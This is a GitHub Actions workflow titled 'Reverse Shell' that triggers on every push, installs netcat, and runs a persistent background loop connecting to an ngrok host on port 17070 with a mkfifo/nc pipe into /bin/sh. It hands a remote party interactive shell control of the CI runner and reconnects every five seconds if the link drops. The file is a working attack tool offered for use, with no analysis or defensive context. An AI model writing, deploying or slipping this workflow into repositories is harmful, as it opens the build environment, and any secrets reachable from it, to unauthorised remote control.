name: Reverse Shell

on: [push]

jobs:
  reverse_shell:
    runs-on: ubuntu-latest

    steps:
    - name: install netcat and Start persistant Reverse Shell loop
      run: |
        sudo apt-get install -y netcat
        while true; do
          mkfifo /tmp/f; nc 0.tcp.us-cal-1.ngrok.io 17070 < /tmp/f | /bin/sh > /tmp/f 2>&1
          sleep 5  # Reattempt after 5 seconds if the connection drops
        done &
        sleep 60  # Keep this open for 60 seconds or more depending on your needs
